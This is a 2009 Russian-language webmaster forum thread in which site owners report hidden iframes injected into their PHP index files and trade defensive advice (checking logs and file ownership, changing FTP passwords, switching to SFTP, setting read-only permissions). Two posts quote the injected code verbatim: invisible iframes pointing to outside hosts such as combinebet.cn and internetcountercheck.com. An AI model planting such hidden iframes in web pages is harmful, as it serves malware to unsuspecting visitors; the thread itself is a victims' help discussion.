Реклама на сайте Advertise with us

Это взлом или диверсия?

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:

Прощай рейтинг

С нами с 30.11.08
Сообщения: 3180
Рейтинг: 808

Ссылка на сообщениеДобавлено: 04/06/09 в 22:16       Ответить с цитатойцитата 

Скрипт ATS 1.8 ротатор Thumbnail Manager Live 1.3

Открываю щас морду своего сиджа, а там заместо сиджа надпись
Parse error: syntax error, unexpected '<' in /home/adults/public_html/index.php on line 9.

Посмотрел файл index
Код:

<?php

$header = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head>';

@include('in.php');

@include($page);

<iframe src="http://combinebet.cn:8080/index.php" width=197 height=138 style="visibility: hidden"><
<iframe src="http://thebestwaytofind.cn:8080/index.php" width=142 height=151 style="visibility: hidden"></iframe>


стер я эти два чюдесных инфрейма
теперь голову ломаю что это за херня такая была icon_confused.gif

0
 



С нами с 30.04.06
Сообщения: 3096
Рейтинг: 2025

Ссылка на сообщениеДобавлено: 04/06/09 в 22:21       Ответить с цитатойцитата 

Еще аз зайди посмотри, может тебе это еще кудато прописали и через некоторое время опять восстановится.

Сдается в наем ....

4
 

Soul's Buyer

С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740


Передовик Master-X (16.10.2008) Передовик Master-X (01.11.2008) Передовик Master-X (16.11.2008) Передовик Master-X (01.12.2008) Передовик Master-X (16.12.2008) Ветеран трепа Master-X (01.01.2009)
Ссылка на сообщениеДобавлено: 04/06/09 в 22:23       Ответить с цитатойцитата 

Ломанули видать, только ифрейм неграмотно написали, лишний < поставили ... Пни админов, пусть смотрят логи, хотя я не помню - если ats генерит индекс сам - хуй они уже чё там найдут, скорее всего, если логи не за неделю хранятся, конечно ...

Cdn быстро, надёжно и недорого!

4
 

Прощай рейтинг

С нами с 30.11.08
Сообщения: 3180
Рейтинг: 808

Ссылка на сообщениеДобавлено: 04/06/09 в 22:54       Ответить с цитатойцитата 

Woland: Скорее всего не дописали просто /iframe>
Но тем не менее именно из за этой < качерги они спалились smail101.gif

0
 



С нами с 21.03.08
Сообщения: 720
Рейтинг: 1013

Ссылка на сообщениеДобавлено: 05/06/09 в 12:31       Ответить с цитатойцитата 

Посмотри владельца index.php. Сам ATS не меняеят. Если владелец не httpd, то твой FTP ассоunt известен еще кому-то. Меняй пароли и чисти комп от вирусов, а вообще юзай SSH и SCP

4
 



С нами с 12.12.02
Сообщения: 25
Рейтинг: 17

Ссылка на сообщениеДобавлено: 09/06/09 в 13:53       Ответить с цитатойцитата 

ААА... Помогите, поймал ету фигню с ифреймоми (код появляется во всех index файлах). Менял пароли, проверял на вирусы (Пандой и Spybot - Search & Destroy)... Но нет, появляется каждое утро на всех FTP. Что делать не знаю, подскажите кто в курсе icon_sad.gif

0
 



С нами с 02.03.06
Сообщения: 68
Рейтинг: -2

Ссылка на сообщениеДобавлено: 16/06/09 в 08:50       Ответить с цитатойцитата 

возможно там в скриптах есть код, который все это дерьмо обновляет, попробуй вычистить все скрипты и установить заново.

1
 

Soul's Buyer

С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740


Передовик Master-X (16.10.2008) Передовик Master-X (01.11.2008) Передовик Master-X (16.11.2008) Передовик Master-X (01.12.2008) Передовик Master-X (16.12.2008) Ветеран трепа Master-X (01.01.2009)
Ссылка на сообщениеДобавлено: 16/06/09 в 09:58       Ответить с цитатойцитата 

Цитата:
ААА... Помогите, поймал ету фигню с ифреймоми (код появляется во всех index файлах). Менял пароли, проверял на вирусы (Пандой и Spybot - Search & Destroy)... Но нет, появляется каждое утро на всех FTP. Что делать не знаю, подскажите кто в курсе


Пинать админов - пусть смотрят логи, что (кто) пишет в файлы и откуда (с сервака или из вне). Если с сервака - удалять, если извне - менять пароли, ограничивать доступ по IP, убирать нахуй ftp протокол с сервера, яростно чистить свой комп и т.д.

Cdn быстро, надёжно и недорого!

1
 



С нами с 21.03.08
Сообщения: 720
Рейтинг: 1013

Ссылка на сообщениеДобавлено: 16/06/09 в 14:41       Ответить с цитатойцитата 

На индекс файл поставить права 444

1
 

Soul's Buyer

С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740


Передовик Master-X (16.10.2008) Передовик Master-X (01.11.2008) Передовик Master-X (16.11.2008) Передовик Master-X (01.12.2008) Передовик Master-X (16.12.2008) Ветеран трепа Master-X (01.01.2009)
Ссылка на сообщениеДобавлено: 16/06/09 в 15:03       Ответить с цитатойцитата 

Цитата:
На индекс файл поставить права 444
если я правильно помню - у ats индекс генерится скриптом и 444 будут не в тему

Cdn быстро, надёжно и недорого!

1
 



С нами с 21.03.08
Сообщения: 720
Рейтинг: 1013

Ссылка на сообщениеДобавлено: 16/06/09 в 15:23       Ответить с цитатойцитата 

Woland писал:
если я правильно помню - у ats индекс генерится скриптом и 444 будут не в тему


Неправльно помниш, ATS не генерит индекс. icon_wink.gif

1
 



С нами с 29.07.03
Сообщения: 426
Рейтинг: 512

Ссылка на сообщениеДобавлено: 16/06/09 в 23:48       Ответить с цитатойцитата 

L.Estel писал:
Неправльно помниш, ATS не генерит индекс. icon_wink.gif


И никогда не генерил, создавал при установке и больше не трогал. Но в последней версии index.php идет в дистрибутиве, и о взломе 1.8 я пока не слышал, да и 1.7.2 достаточно надежен.
Так что это либо через фтп залезли, либо с соседнего аккаунта, если хост шареный, 444 в этом случае помогут. Еще можно на templates/*.tpl поставить 444, для спокойного сна. Но если по фтп лезут - не спасет, естественно.

5
 

Soul's Buyer

С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740


Передовик Master-X (16.10.2008) Передовик Master-X (01.11.2008) Передовик Master-X (16.11.2008) Передовик Master-X (01.12.2008) Передовик Master-X (16.12.2008) Ветеран трепа Master-X (01.01.2009)
Ссылка на сообщениеДобавлено: 16/06/09 в 23:56       Ответить с цитатойцитата 

Оффтопик: Ну ладно, ладно ... Я тут пытаюсь какеров на ложный след навести - и от те на, нарисовались, правдолюбы ... smail101.gif

Если серьёзно - ну да, запамятовал, с кем не бывает icon_smile.gif

Cdn быстро, надёжно и недорого!

1
 



С нами с 12.12.02
Сообщения: 25
Рейтинг: 17

Ссылка на сообщениеДобавлено: 17/06/09 в 19:49       Ответить с цитатойцитата 

Спасибо за ваши ответы... Вот ещё один вопрос, посоветуйте пожалуста менеджер чтоб безопасно загружать файлы на FTP. Все которые я использовал они сохраняют все логины и пароли, а есть разовые, безопасные заходы без сохранения паролей. очень плохо разбираюсь в этих делах, спасибо за понимание...

0
 

Soul's Buyer

С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740


Передовик Master-X (16.10.2008) Передовик Master-X (01.11.2008) Передовик Master-X (16.11.2008) Передовик Master-X (01.12.2008) Передовик Master-X (16.12.2008) Ветеран трепа Master-X (01.01.2009)
Ссылка на сообщениеДобавлено: 17/06/09 в 22:18       Ответить с цитатойцитата 

Цитата:
Все которые я использовал они сохраняют все логины и пароли, а есть разовые, безопасные заходы без сохранения паролей. очень плохо разбираюсь в этих делах, спасибо за понимание...


WinSCP http://winscp.net/eng/download.php не запоминает пароли, если не нажать специально "save", много умеет, бесплатен.
Но лучше не использовать ftp вообще (не поднимать на серваке, это к админам), а юзать sftp скажем, с помощью того же клиента.

Cdn быстро, надёжно и недорого!

1
 



С нами с 05.04.07
Сообщения: 556
Рейтинг: 381

Ссылка на сообщениеДобавлено: 19/06/09 в 11:31       Ответить с цитатойцитата 

Короче я тебя Очень растрою!
У меня на одном серваке, очень похожая хрень появилась года полтора назад. Что ни делали, все пох. С периодичностью в 2-3 месяца эта хрень появляеться в коде. Как ее побороть ни я ни админы незнают. Что тока не делали поменяли железо и все напрасно,... это блин как герпесс, вроде все поличил а рано или позно всерано вылазит ))))
САМ ГЕРПЕСОМ НЕ СТРАДАЮ, написал для сравнения. icon_smile.gif

Чаще всего в топах протона.
Спасение тока в чмодах 444 на все шаблоны и страницы,...

кста вот мой код, может кто что и мне посоветует

<iframe src=\"http://niklejo.net/?click=DDBD90\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

echo "<iframe src=\"http://internetcountercheck.com/?click=16010546\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>

1
 

Soul's Buyer

С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740


Передовик Master-X (16.10.2008) Передовик Master-X (01.11.2008) Передовик Master-X (16.11.2008) Передовик Master-X (01.12.2008) Передовик Master-X (16.12.2008) Ветеран трепа Master-X (01.01.2009)
Ссылка на сообщениеДобавлено: 19/06/09 в 12:44       Ответить с цитатойцитата 

Цитата:
Короче я тебя Очень растрою!
...
...
...


Очень драматичная история, как админы на сервере или ты у себя на компе закладку найти не можешь полтора года - только зачем его то расстраивать ? icon_smile.gif

Cdn быстро, надёжно и недорого!

1
 



С нами с 12.12.02
Сообщения: 25
Рейтинг: 17

Ссылка на сообщениеДобавлено: 25/06/09 в 16:09       Ответить с цитатойцитата 

Всем спасибо, пока все ОК (тфу-тфу-тфу). Надеюсь так и будет.

0
 

Прощай рейтинг

С нами с 30.11.08
Сообщения: 3180
Рейтинг: 808

Ссылка на сообщениеДобавлено: 25/06/09 в 20:28       Ответить с цитатойцитата 

А мне вот интересно домены зон (cn) неприкасаемые?
В этой доменной зоне что разрешено распространять вирусы?

0
 

Soul's Buyer

С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740


Передовик Master-X (16.10.2008) Передовик Master-X (01.11.2008) Передовик Master-X (16.11.2008) Передовик Master-X (01.12.2008) Передовик Master-X (16.12.2008) Ветеран трепа Master-X (01.01.2009)
Ссылка на сообщениеДобавлено: 27/06/09 в 14:32       Ответить с цитатойцитата 

Mad Knight: Это китай icon_smile.gif Там ничего нельзя, но всё можно icon_smile.gif
Абузы могут читать только на китайском, например icon_smile.gif

Cdn быстро, надёжно и недорого!

1
 

Прощай рейтинг

С нами с 30.11.08
Сообщения: 3180
Рейтинг: 808

Ссылка на сообщениеДобавлено: 27/06/09 в 16:52       Ответить с цитатойцитата 

Woland: Как с порно бороться дак это они первые, а как вирусы убирать так извините мы китайцы и по английски не бум бум.
Сволочи они, а не китайцы smail101.gif

0
 

Soul's Buyer

С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740


Передовик Master-X (16.10.2008) Передовик Master-X (01.11.2008) Передовик Master-X (16.11.2008) Передовик Master-X (01.12.2008) Передовик Master-X (16.12.2008) Ветеран трепа Master-X (01.01.2009)
Ссылка на сообщениеДобавлено: 27/06/09 в 17:11       Ответить с цитатойцитата 

Цитата:
Как с порно бороться дак это они первые, а как вирусы убирать так извините мы китайцы и по английски не бум бум.
Оффтопик: А что тебя удивляет - в порно всё понятно без слов, в этом одна из причин его популярности icon_smile.gif

Cdn быстро, надёжно и недорого!

1
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »